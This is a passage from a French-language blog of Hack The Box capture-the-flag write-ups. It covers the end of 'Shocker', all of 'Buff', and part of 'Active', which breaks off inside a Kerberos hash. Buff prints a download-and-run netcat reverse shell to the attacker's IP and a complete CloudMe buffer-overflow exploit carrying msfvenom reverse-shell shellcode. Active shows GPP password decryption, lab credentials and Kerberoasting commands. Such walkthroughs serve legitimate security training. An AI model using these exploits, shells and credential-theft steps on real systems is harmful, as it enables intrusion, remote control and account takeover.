\u0026lt;p\u0026gt;More information about this error may be available | in the server error log.\u0026lt;/p\u0026gt; | \u0026lt;hr\u0026gt; | \u0026lt;address\u0026gt;Apache/2.4.18 (Ubuntu) Server at shocker.htb Port 80\u0026lt;/address\u0026gt; | \u0026lt;/body\u0026gt;\u0026lt;/html\u0026gt; | | References: | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7169 | http://seclists.org/oss-sec/2014/q3/685 | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271 |_ http://www.openwall.com/lists/oss-security/2014/09/24/10 Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 6.77 seconds ","date":"2025-01-13T00:00:00Z","permalink":"https://leopoldabgn.github.io/writeups/p/shocker-htb/","title":"HTB | Shocker"},{"content":" Machine name OS IP Difficulty Buff Windows 10.10.10.198 Easy IP 1 10.10.10.198 Enumeration nmap 1 2 3 4 5 6 7 8 9 10 11 $ nmap -sS -sV -An -p- -vvv -T4 10.10.10.198 PORT STATE SERVICE REASON VERSION 7680/tcp open pando-pub? syn-ack ttl 127 8080/tcp open http syn-ack ttl 127 Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6) | http-open-proxy: Potentially OPEN proxy. |_Methods supported:CONNECTION |_http-title: mrb3n\u0026#39;s Bro Hut | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6 Foothold Directory enumeration : buff.htb - port 8080 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 $ gobuster dir -u http://buff.htb:8080/ -t 50 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt =============================================================== Gobuster v3.6 by OJ Reeves (@TheColonial) \u0026amp; Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://buff.htb:8080/ [+] Method: GET [+] Threads: 50 [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.6 [+] Timeout: 10s =============================================================== Starting gobuster in directory enumeration mode =============================================================== /profile (Status: 301) [Size: 337] [--\u0026gt; http://buff.htb:8080/profile/] /img (Status: 301) [Size: 333] [--\u0026gt; http://buff.htb:8080/img/] /upload (Status: 301) [Size: 336] [--\u0026gt; http://buff.htb:8080/upload/] /license (Status: 200) [Size: 18025] /include (Status: 301) [Size: 337] [--\u0026gt; http://buff.htb:8080/include/] /examples (Status: 503) [Size: 1054] /licenses (Status: 403) [Size: 1199] /Profile (Status: 301) [Size: 337] [--\u0026gt; http://buff.htb:8080/Profile/] /LICENSE (Status: 200) [Size: 18025] /att (Status: 301) [Size: 333] [--\u0026gt; http://buff.htb:8080/att/] /%20 (Status: 403) [Size: 1040] /IMG (Status: 301) [Size: 333] [--\u0026gt; http://buff.htb:8080/IMG/] /License (Status: 200) [Size: 18025] /ex (Status: 301) [Size: 332] [--\u0026gt; http://buff.htb:8080/ex/] /*checkout* (Status: 403) [Size: 1040] /Img (Status: 301) [Size: 333] [--\u0026gt; http://buff.htb:8080/Img/] /boot (Status: 301) [Size: 334] [--\u0026gt; http://buff.htb:8080/boot/] /Upload (Status: 301) [Size: 336] [--\u0026gt; http://buff.htb:8080/Upload/] /phpmyadmin (Status: 403) [Size: 1199] /webalizer (Status: 403) [Size: 1040] /*docroot* (Status: 403) [Size: 1040] /* (Status: 403) [Size: 1040] /con (Status: 403) [Size: 1040] /Include (Status: 301) [Size: 337] [--\u0026gt; http://buff.htb:8080/Include/] /http%3A (Status: 403) [Size: 1040] /**http%3a (Status: 403) [Size: 1040] /*http%3A (Status: 403) [Size: 1040] /aux (Status: 403) [Size: 1040] /Boot (Status: 301) [Size: 334] [--\u0026gt; http://buff.htb:8080/Boot/] /**http%3A (Status: 403) [Size: 1040] /%C0 (Status: 403) [Size: 1040] /server-status (Status: 403) [Size: 1199] /%3FRID%3D2671 (Status: 403) [Size: 1040] /devinmoore* (Status: 403) [Size: 1040] /Ex (Status: 301) [Size: 332] [--\u0026gt; http://buff.htb:8080/Ex/] ... Le /ex est intéressant et indique des infos avec une erreur mysqli !\n1 Warning: mysqli::__construct(): (HY000/1049): Unknown database \u0026#39;secure_login\u0026#39; in C:\\xampp\\htdocs\\gym\\ex\\include\\db_connect.php on line 3 Gym Management System 1.0 - Unauthenticated RCE On recherche \u0026ldquo;Gym\u0026rdquo; dans searchsploit ou sur internet on trouve rapidement un exploit python permettant d\u0026rsquo;uploader un fichier php et d\u0026rsquo;executer n\u0026rsquo;importe quelle commande.\n1 2 3 4 5 6 7 8 9 10 11 12 13 $ python3 exploit2.py http://buff.htb:8080/ /home/kali/htb/Buff/exploit2.py:77: SyntaxWarning: invalid escape sequence \u0026#39;\\/\u0026#39; SIG += BL+\u0026#39; \\/\u0026#39;+RS+\u0026#39;\\n\u0026#39; /\\ /vvvvvvvvvvvv \\--------------------------------------, `^^^^^^^^^^^^ /============BOKU=====================\u0026#34; \\/ [+] Successfully connected to webshell. C:\\xampp\\htdocs\\gym\\upload\u0026gt; powershell cat ../../../../Users/shaun/Desktop/user.txt PNG ▒ b6a5....ce0d3 Stablize shell 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 $ python3 -m http.server 8888 Serving HTTP on 0.0.0.0 port 8888 (http://0.0.0.0:8888/) ... 10.10.10.198 - - [07/Jan/2025 17:07:08] \u0026#34;GET /nc.exe HTTP/1.1\u0026#34; 200 - -------------------------------------------------------------- # RCE from website C:\\xampp\\htdocs\\gym\\upload\u0026gt; curl -O http://10.10.14.42:8888/nc.exe C:\\xampp\\htdocs\\gym\\upload\u0026gt; nc.exe 10.10.14.42 1337 -e cmd.exe -------------------------------------------------------------- $ nc -lvnp 1337 listening on [any] 1337 ... connect to [10.10.14.42] from (UNKNOWN) [10.10.10.198] 50531 Microsoft Windows [Version 10.0.17134.1610] (c) 2018 Microsoft Corporation. All rights reserved. C:\\xampp\\htdocs\\gym\\upload\u0026gt;whoami whoami buff\\shaun C:\\xampp\\htdocs\\gym\\upload\u0026gt;powershell powershell Windows PowerShell Copyright (C) Microsoft Corporation. All rights reserved. PS C:\\xampp\\htdocs\\gym\\upload\u0026gt; Privilege escalation CloudMe_1112.exe En fouillant dans les fichiers, on trouve un exectutable CloudMe_1112.exe. Il se trouve que cette version tourne par défaut sur le port 8888 lorsqu\u0026rsquo;on l\u0026rsquo;execute, ce qui est bien le cas pour notre machine\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 PS C:\\xampp\\htdocs\\gym\\upload\u0026gt; tasklist | findstr Cloud tasklist | findstr Cloud CloudMe.exe 284 0 18,048 K PS C:\\xampp\\htdocs\\gym\\upload\u0026gt; netstat -ano | findstr LISTENING netstat -ano | findstr LISTENING TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 944 TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4 TCP 0.0.0.0:5040 0.0.0.0:0 LISTENING 6188 TCP 0.0.0.0:7680 0.0.0.0:0 LISTENING 7832 TCP 0.0.0.0:8080 0.0.0.0:0 LISTENING 8820 TCP 0.0.0.0:49664 0.0.0.0:0 LISTENING 524 TCP 0.0.0.0:49665 0.0.0.0:0 LISTENING 1064 TCP 0.0.0.0:49666 0.0.0.0:0 LISTENING 1644 TCP 0.0.0.0:49667 0.0.0.0:0 LISTENING 2248 TCP 0.0.0.0:49668 0.0.0.0:0 LISTENING 668 TCP 0.0.0.0:49669 0.0.0.0:0 LISTENING 684 TCP 10.10.10.198:139 0.0.0.0:0 LISTENING 4 TCP 127.0.0.1:3306 0.0.0.0:0 LISTENING 8936 TCP [::]:135 [::]:0 LISTENING 944 TCP [::]:445 [::]:0 LISTENING 4 TCP [::]:7680 [::]:0 LISTENING 7832 TCP [::]:8080 [::]:0 LISTENING 8820 TCP [::]:49664 [::]:0 LISTENING 524 TCP [::]:49665 [::]:0 LISTENING 1064 TCP [::]:49666 [::]:0 LISTENING 1644 TCP [::]:49667 [::]:0 LISTENING 2248 TCP [::]:49668 [::]:0 LISTENING 668 TCP [::]:49669 [::]:0 LISTENING 684 CloudMe 1.11.2 - Buffer Overflow 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 $ searchsploit cloudme ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- --------------------------------- Exploit Title | Path ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- --------------------------------- CloudMe 1.11.2 - Buffer Overflow (PoC) | windows/remote/48389.py \u0026lt;---------------------- CloudMe 1.11.2 - Buffer Overflow (SEH_DEP_ASLR) | windows/local/48499.txt CloudMe 1.11.2 - Buffer Overflow ROP (DEP_ASLR) | windows/local/48840.py Cloudme 1.9 - Buffer Overflow (DEP) (Metasploit) | windows_x86-64/remote/45197.rb CloudMe Sync 1.10.9 - Buffer Overflow (SEH)(DEP Bypass) | windows_x86-64/local/45159.py CloudMe Sync 1.10.9 - Stack-Based Buffer Overflow (Metasploit) | windows/remote/44175.rb CloudMe Sync 1.11.0 - Local Buffer Overflow | windows/local/44470.py CloudMe Sync 1.11.2 - Buffer Overflow + Egghunt | windows/remote/46218.py CloudMe Sync 1.11.2 Buffer Overflow - WoW64 (DEP Bypass) | windows_x86-64/remote/46250.py CloudMe Sync \u0026lt; 1.11.0 - Buffer Overflow | windows/remote/44027.py CloudMe Sync \u0026lt; 1.11.0 - Buffer Overflow (SEH) (DEP Bypass) | windows_x86-64/remote/44784.py ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- --------------------------------- Shellcodes: No Results Le fichier python contient un payload généré avec msfvenom mais qui ne fonctionne pas pour notre windows 10 x64 victime. Nous avons donc généré un nouveau payload. Ensuite, on a remplacer ce code dans le python.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 msfvenom -a x86 -p windows/shell_reverse_tcp LHOST=10.10.14.42 LPORT=9001 -b \u0026#39;\\x00\\x0A\\x0D\u0026#39; -f python ... ... $ cat exploit_cloudme.py # Exploit Title: CloudMe 1.11.2 - Buffer Overflow (PoC) # Date: 2020-04-27 # Exploit Author: Andy Bowden # Vendor Homepage: https://www.cloudme.com/en # Software Link: https://www.cloudme.com/downloads/CloudMe_1112.exe # Version: CloudMe 1.11.2 # Tested on: Windows 10 x86 #Instructions: # Start the CloudMe service and run the script. import socket target = \u0026#34;127.0.0.1\u0026#34; padding1 = b\u0026#34;\\x90\u0026#34; * 1052 EIP = b\u0026#34;\\xB5\\x42\\xA8\\x68\u0026#34; # 0x68A842B5 -\u0026gt; PUSH ESP, RET NOPS = b\u0026#34;\\x90\u0026#34; * 30 buf = b\u0026#34;\u0026#34; buf += b\u0026#34;\\xbb\\x9b\\xa8\\x51\\x15\\xdb\\xd1\\xd9\\x74\\x24\\xf4\\x5e\u0026#34; buf += b\u0026#34;\\x2b\\xc9\\xb1\\x52\\x31\\x5e\\x12\\x83\\xc6\\x04\\x03\\xc5\u0026#34; buf += b\u0026#34;\\xa6\\xb3\\xe0\\x05\\x5e\\xb1\\x0b\\xf5\\x9f\\xd6\\x82\\x10\u0026#34; buf += b\u0026#34;\\xae\\xd6\\xf1\\x51\\x81\\xe6\\x72\\x37\\x2e\\x8c\\xd7\\xa3\u0026#34; buf += b\u0026#34;\\xa5\\xe0\\xff\\xc4\\x0e\\x4e\\x26\\xeb\\x8f\\xe3\\x1a\\x6a\u0026#34; buf += b\u0026#34;\\x0c\\xfe\\x4e\\x4c\\x2d\\x31\\x83\\x8d\\x6a\\x2c\\x6e\\xdf\u0026#34; buf += b\u0026#34;\\x23\\x3a\\xdd\\xcf\\x40\\x76\\xde\\x64\\x1a\\x96\\x66\\x99\u0026#34; buf += b\u0026#34;\\xeb\\x99\\x47\\x0c\\x67\\xc0\\x47\\xaf\\xa4\\x78\\xce\\xb7\u0026#34; buf += b\u0026#34;\\xa9\\x45\\x98\\x4c\\x19\\x31\\x1b\\x84\\x53\\xba\\xb0\\xe9\u0026#34; buf += b\u0026#34;\\x5b\\x49\\xc8\\x2e\\x5b\\xb2\\xbf\\x46\\x9f\\x4f\\xb8\\x9d\u0026#34; buf += b\u0026#34;\\xdd\\x8b\\x4d\\x05\\x45\\x5f\\xf5\\xe1\\x77\\x8c\\x60\\x62\u0026#34; buf += b\u0026#34;\\x7b\\x79\\xe6\\x2c\\x98\\x7c\\x2b\\x47\\xa4\\xf5\\xca\\x87\u0026#34; buf += b\u0026#34;\\x2c\\x4d\\xe9\\x03\\x74\\x15\\x90\\x12\\xd0\\xf8\\xad\\x44\u0026#34; buf += b\u0026#34;\\xbb\\xa5\\x0b\\x0f\\x56\\xb1\\x21\\x52\\x3f\\x76\\x08\\x6c\u0026#34; buf += b\u0026#34;\\xbf\\x10\\x1b\\x1f\\x8d\\xbf\\xb7\\xb7\\xbd\\x48\\x1e\\x40\u0026#34; buf += b\u0026#34;\\xc1\\x62\\xe6\\xde\\x3c\\x8d\\x17\\xf7\\xfa\\xd9\\x47\\x6f\u0026#34; buf += b\u0026#34;\\x2a\\x62\\x0c\\x6f\\xd3\\xb7\\x83\\x3f\\x7b\\x68\\x64\\xef\u0026#34; buf += b\u0026#34;\\x3b\\xd8\\x0c\\xe5\\xb3\\x07\\x2c\\x06\\x1e\\x20\\xc7\\xfd\u0026#34; buf += b\u0026#34;\\xc9\\x45\\x12\\xf3\\x23\\x32\\x20\\x0b\\x17\\xeb\\xad\\xed\u0026#34; buf += b\u0026#34;\\x3d\\xfb\\xfb\\xa6\\xa9\\x62\\xa6\\x3c\\x4b\\x6a\\x7c\\x39\u0026#34; buf += b\u0026#34;\\x4b\\xe0\\x73\\xbe\\x02\\x01\\xf9\\xac\\xf3\\xe1\\xb4\\x8e\u0026#34; buf += b\u0026#34;\\x52\\xfd\\x62\\xa6\\x39\\x6c\\xe9\\x36\\x37\\x8d\\xa6\\x61\u0026#34; buf += b\u0026#34;\\x10\\x63\\xbf\\xe7\\x8c\\xda\\x69\\x15\\x4d\\xba\\x52\\x9d\u0026#34; buf += b\u0026#34;\\x8a\\x7f\\x5c\\x1c\\x5e\\x3b\\x7a\\x0e\\xa6\\xc4\\xc6\\x7a\u0026#34; buf += b\u0026#34;\\x76\\x93\\x90\\xd4\\x30\\x4d\\x53\\x8e\\xea\\x22\\x3d\\x46\u0026#34; buf += b\u0026#34;\\x6a\\x09\\xfe\\x10\\x73\\x44\\x88\\xfc\\xc2\\x31\\xcd\\x03\u0026#34; buf += b\u0026#34;\\xea\\xd5\\xd9\\x7c\\x16\\x46\\x25\\x57\\x92\\x76\\x6c\\xf5\u0026#34; buf += b\u0026#34;\\xb3\\x1e\\x29\\x6c\\x86\\x42\\xca\\x5b\\xc5\\x7a\\x49\\x69\u0026#34; buf += b\u0026#34;\\xb6\\x78\\x51\\x18\\xb3\\xc5\\xd5\\xf1\\xc9\\x56\\xb0\\xf5\u0026#34; buf += b\u0026#34;\\x7e\\x56\\x91\u0026#34; payload = buf overrun = b\u0026#34;C\u0026#34; * (1500 - len(padding1 + NOPS + EIP + payload)) buf = padding1 + EIP + NOPS + payload + overrun try: s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((target,8888)) s.send(buf) except Exception as e: print(sys.exc_value) Chisel - port forwarding (8888) Mise en place de chisel, pour dupliquer le port 8888 de la machine cible sur la machine locale. EN effet, ce port n\u0026rsquo;est accessible que depuis la machine cible normalement : Or, pour exploiter notre vuln, avec le script python , il faut que le port soit accessible sur notre machine local qui dispose bien de python.\n1 2 3 4 5 6 7 8 9 10 11 12 13 kali@kali:~/htb/Buff$ ./chisel server -p 1082 --reverse 2025/01/10 20:17:44 server: Reverse tunnelling enabled 2025/01/10 20:17:44 server: Fingerprint iiSKQuGUrbyvUjt5afbcmjecM6T6JHMCaV2+4LBLk3g= 2025/01/10 20:17:44 server: Listening on http://0.0.0.0:1082 2025/01/10 20:19:07 server: session#1: tun: proxy#R:8888=\u0026gt;localhost:8888: Listening ------------------------------------------------------------------------- # Windows target PS C:\\xampp\\htdocs\\gym\\upload\u0026gt; .\\chisel.exe client 10.10.14.42:1082 R:8888:localhost:8888 .\\chisel.exe client 10.10.14.42:1082 R:8888:localhost:8888 2025/01/11 01:19:06 client: Connecting to ws://10.10.14.42:1082 2025/01/11 01:19:07 client: Connected (Latency 22.8931ms) Exploitation (root.txt) Enfin, on execute l\u0026rsquo;exploit final et on obtient un shell en tant que root sur la machine windows :\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 ┌──(kali㉿kali)-[~/htb/Buff] └─$ python3 exploit_cloudme.py ┌──(kali㉿kali)-[~/htb/Buff] └─$ python3 exploit_cloudme.py ┌──(kali㉿kali)-[~/htb/Buff] └─$ python3 exploit_cloudme.py -------------------------------------------------- $ nc -lnvp 9001 listening on [any] 9001 ... connect to [10.10.14.42] from (UNKNOWN) [10.10.10.198] 49685 Microsoft Windows [Version 10.0.17134.1610] (c) 2018 Microsoft Corporation. All rights reserved. C:\\Windows\\system32\u0026gt;whoami whoami buff\\administrator C:\\Windows\\system32\u0026gt;cd ../../Users/Administrator/Desktop cd ../../Users/Administrator/Desktop C:\\Users\\Administrator\\Desktop\u0026gt;cat root.txt cat root.txt \u0026#39;cat\u0026#39; is not recognized as an internal or external command, operable program or batch file. C:\\Users\\Administrator\\Desktop\u0026gt;type root.txt type root.txt 39c4....c39f C:\\Users\\Administrator\\Desktop\u0026gt;powershell powershell Windows PowerShell Copyright (C) Microsoft Corporation. All rights reserved. PS C:\\Users\\Administrator\\Desktop\u0026gt; whoami whoami buff\\administrator ","date":"2025-01-12T00:00:00Z","permalink":"https://leopoldabgn.github.io/writeups/p/buff-htb/","title":"HTB | Buff"},{"content":" Machine name OS IP Difficulty Active Windows 10.10.10.100 Easy Users 1 2 SVC_TGS : GPPstillStandingStrong2k18 Administrator : Ticketmaster1968 Version Windows Server 2008 R2 SP1\nEnumeration nmap 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 nmap -sC -sV -An -p- 10.10.10.100 Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-12 17:12 EST Nmap scan report for 10.10.10.100 Host is up (0.027s latency). Not shown: 65512 closed tcp ports (reset) PORT STATE SERVICE VERSION 53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1) | dns-nsid: |_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39) 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-12-12 22:12:47Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name) 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name) 3269/tcp open tcpwrapped 5722/tcp open msrpc Microsoft Windows RPC 9389/tcp open mc-nmf .NET Message Framing 47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-title: Not Found |_http-server-header: Microsoft-HTTPAPI/2.0 49152/tcp open msrpc Microsoft Windows RPC 49153/tcp open msrpc Microsoft Windows RPC 49154/tcp open msrpc Microsoft Windows RPC 49155/tcp open msrpc Microsoft Windows RPC 49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 49158/tcp open msrpc Microsoft Windows RPC 49165/tcp open msrpc Microsoft Windows RPC 49166/tcp open msrpc Microsoft Windows RPC 49168/tcp open msrpc Microsoft Windows RPC Host script results: | smb2-security-mode: | 2:1:0: |_ Message signing enabled and required | smb2-time: | date: 2024-12-12T22:13:57 |_ start_date: 2024-12-12T22:09:06 enu4mlinux 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 [+] Got OS info for 10.10.10.100 from srvinfo: 10.10.10.100 Wk Sv PDC Tim NT Domain Controller platform_id : 500 os version : 6.1 server type : 0x80102b =================================( Share Enumeration on 10.10.10.100 )================================= do_connect: Connection to 10.10.10.100 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND) Sharename Type Comment --------- ---- ------- ADMIN$ Disk Remote Admin C$ Disk Default share IPC$ IPC Remote IPC NETLOGON Disk Logon server share Replication Disk SYSVOL Disk Logon server share Users Disk Reconnecting with SMB1 for workgroup listing. Unable to connect with SMB1 -- no workgroup available [+] Attempting to map shares on 10.10.10.100 //10.10.10.100/ADMIN$ Mapping: DENIED Listing: N/A Writing: N/A //10.10.10.100/C$ Mapping: DENIED Listing: N/A Writing: N/A //10.10.10.100/IPC$ Mapping: OK Listing: DENIED Writing: N/A //10.10.10.100/NETLOGON Mapping: DENIED Listing: N/A Writing: N/A //10.10.10.100/Replication Mapping: OK Listing: OK Writing: N/A //10.10.10.100/SYSVOL Mapping: DENIED Listing: N/A Writing: N/A //10.10.10.100/Users Mapping: DENIED Listing: N/A Writing: N/A Foothold SMB Share \u0026ldquo;Replication\u0026rdquo; En fouillant le SMB share \u0026ldquo;replication\u0026rdquo; accessible avec un utilisateur anonyme, on trouve un fichier intéressant parmis les autres:\nGroups.xml Il semble contenir un mot de passe chiffré.\nExplication de ChatGPT :\nLe mot de passe chiffré dans le champ cpassword que vous montrez est très probablement encodé en AES-256-CBC et fait partie d\u0026rsquo;une configuration XML de stratégie de groupe Windows (Group Policy Preferences, ou GPP). Ces cpassword sont généralement liés à des configurations de comptes d\u0026rsquo;utilisateurs déployés via les GPP.\nGPP Exploitation On déchiffre le mot de passe, ce qui nous donne : GPPstillStandingStrong2k18 Le username associé est également donné dans le xml : SVC_TGS\n1 2 3 4 5 6 7 8 9 10 11 12 smbclient --no-pass //10.10.10.100/Replication ... ┌──(kali㉿kali)-[~] └─$ cat Groups.xml \u0026lt;?xml version=\u0026#34;1.0\u0026#34; encoding=\u0026#34;utf-8\u0026#34;?\u0026gt; \u0026lt;Groups clsid=\u0026#34;{3125E937-EB16-4b4c-9934-544FC6D24D26}\u0026#34;\u0026gt;\u0026lt;User clsid=\u0026#34;{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}\u0026#34; name=\u0026#34;active.htb\\SVC_TGS\u0026#34; image=\u0026#34;2\u0026#34; changed=\u0026#34;2018-07-18 20:46:06\u0026#34; uid=\u0026#34;{EF57DA28-5F69-4530-A59E-AAB58578219D}\u0026#34;\u0026gt;\u0026lt;Properties action=\u0026#34;U\u0026#34; newName=\u0026#34;\u0026#34; fullName=\u0026#34;\u0026#34; description=\u0026#34;\u0026#34; cpassword=\u0026#34;edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ\u0026#34; changeLogon=\u0026#34;0\u0026#34; noChange=\u0026#34;1\u0026#34; neverExpires=\u0026#34;1\u0026#34; acctDisabled=\u0026#34;0\u0026#34; userName=\u0026#34;active.htb\\SVC_TGS\u0026#34;/\u0026gt;\u0026lt;/User\u0026gt; \u0026lt;/Groups\u0026gt; ┌──(kali㉿kali)-[~] └─$ gpp-decrypt \u0026#34;edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ\u0026#34; GPPstillStandingStrong2k18 user flag - SMB Share Users En scannat a nouveau les shares SMB, cette fois-ci avec notre user/password obtenu, on voit qu\u0026rsquo;on a acces au share \u0026ldquo;Users\u0026rdquo; en readonly. On y trouve un dossier avec le nom de notre utilisateur et tous ces fichiers Windows, avec le flag user.txt :\n1fc4\u0026hellip;..a676\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 ┌──(kali㉿kali)-[~/htb/Active/bloodhound1] └─$ smbclient //10.10.10.100/Users -U \u0026#39;SVC_TGS%GPPstillStandingStrong2k18\u0026#39; Try \u0026#34;help\u0026#34; to get a list of possible commands. smb: \\\u0026gt; ls . DR 0 Sat Jul 21 10:39:20 2018 .. DR 0 Sat Jul 21 10:39:20 2018 Administrator D 0 Mon Jul 16 06:14:21 2018 All Users DHSrn 0 Tue Jul 14 01:06:44 2009 Default DHR 0 Tue Jul 14 02:38:21 2009 Default User DHSrn 0 Tue Jul 14 01:06:44 2009 desktop.ini AHS 174 Tue Jul 14 00:57:55 2009 Public DR 0 Tue Jul 14 00:57:55 2009 SVC_TGS D 0 Sat Jul 21 11:16:32 2018 5217023 blocks of size 4096. 278586 blocks available smb: \\\u0026gt; cd SVC_TGS\\ smb: \\SVC_TGS\\\u0026gt; ls . D 0 Sat Jul 21 11:16:32 2018 .. D 0 Sat Jul 21 11:16:32 2018 Contacts D 0 Sat Jul 21 11:14:11 2018 Desktop D 0 Sat Jul 21 11:14:42 2018 Downloads D 0 Sat Jul 21 11:14:23 2018 Favorites D 0 Sat Jul 21 11:14:44 2018 Links D 0 Sat Jul 21 11:14:57 2018 My Documents D 0 Sat Jul 21 11:15:03 2018 My Music D 0 Sat Jul 21 11:15:32 2018 My Pictures D 0 Sat Jul 21 11:15:43 2018 My Videos D 0 Sat Jul 21 11:15:53 2018 Saved Games D 0 Sat Jul 21 11:16:12 2018 Searches D 0 Sat Jul 21 11:16:24 2018 5217023 blocks of size 4096. 278586 blocks available ┌──(kali㉿kali)-[~/htb/Active/bloodhound1] └─$ sudo mount -t cifs -o username=\u0026#39;SVC_TGS\u0026#39;,password=\u0026#39;GPPstillStandingStrong2k18\u0026#39; //10.10.10.100/Users/SVC_TGS /mnt/smb ┌──(kali㉿kali)-[~/htb/Active/bloodhound1] └─$ xdg-open /mnt/smb Privilege Escalation Kerberoasting Attack on SPN \u0026lsquo;CIFS\u0026rsquo; Cette commande exécute l\u0026rsquo;outil GetUserSPNs.py de la suite Impacket pour récupérer les Service Principal Names (SPN) configurés dans l\u0026rsquo;Active Directory, liés à des comptes de service. Ici, nous vérifions s\u0026rsquo;il existe un SPN qui pourrait être exploité pour effectuer une attaque de Kerberoasting.\n1 2 3 4 5 6 $ impacket-GetUserSPNs active.htb/SVC_TGS:\u0026#34;GPPstillStandingStrong2k18\u0026#34; -dc-ip 10.10.10.100 Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation -------------------- ------------- -------------------------------------------------------- -------------------------- -------------------------- ---------- active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb 2018-07-18 15:06:40.351723 2025-01-04 07:30:15.825757 L\u0026rsquo;option -request permet de demander un ticket TGS (Ticket Granting Service) pour les SPN trouvés. Ce ticket est ensuite extrait sous forme de hash Kerberos, qui pourra être craqué hors ligne.\n1 2 3 4 5 6 7 8 9 10 $ impacket-GetUserSPNs active.htb/SVC_TGS:\u0026#34;GPPstillStandingStrong2k18\u0026#34; -request -dc-ip 10.10.10.100 Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation -------------------- ------------- -------------------------------------------------------- -------------------------- -------------------------- ---------- active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb 2018-07-18 15:06:40.351723 2025-01-04 07:30:15.825757 [-] CCache file is not found. Skipping... $krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$8852493078c2a4f352f6468b34dcd243$38b8aa13f6ffb46cd7866c10ab7d0dc3a54117cfe4cd271fba599fa52f84b826cb94edda0fada6c386721fa3edfc10cf58b23c35cfdbd409e42d9ba81b84cab539fb285d561f7a8c15f3ee813eede43d56618635868377a8b9fe39c0708da79aebe14351a3bcf89b1d6f248a545a042772b27bd528c91df09e5b900df3b5188cd734316acd1416c63bf032540166f0e319db943dc7a099234da10956156f753927dafbb8f1c244df2b4a3c349f333a1cb6d26ae607a037b9a39a0f995f8ba811d7b8dfc58100c6b88b8493c1d85dee40d784f275c24184e727c3e55baa2fa233a28a820e5d04684b320b925588f9eb37568891bef410775ec5c001c0dbbe9b8b1acce9b7b55aa54b37367fabede080a6a270e5a79b49ff27f83f90da85a6bbe4a99210d6fb4a9d01faee68080243f6bc04131beb8111fceeedc87bbdd9168d95d3e15e262ed2a7a0bbda46c0a51bdbb32fc98bd81252f31f928e317b06a768ed51e75e58dc66b430f9638d2996944b324ea624be7fc9a24ff5b2cd4ab9ae0b156fc9747c8c7482b785815c46293b772f1d920c776b2a6aa2ab1bf815543ba5070381cd55f21b4c9b9a70172c3e637dad6e91c1e03651de9f8532e537119b2062f63c92a771ba8fe33b3ca7a674a204331d3f577bff722492b960c241a84c59f63b28b7eeba74c37db41f4d91215e3421d820b39b4a1dfd9477b885385c8bf578718ef8f8ca659818795dd182bc91f7e13afae7cf4e38cf9bb5f4e6530ec9ae3272873e706dd528e52bbedfd39de18621c71eed9556eaec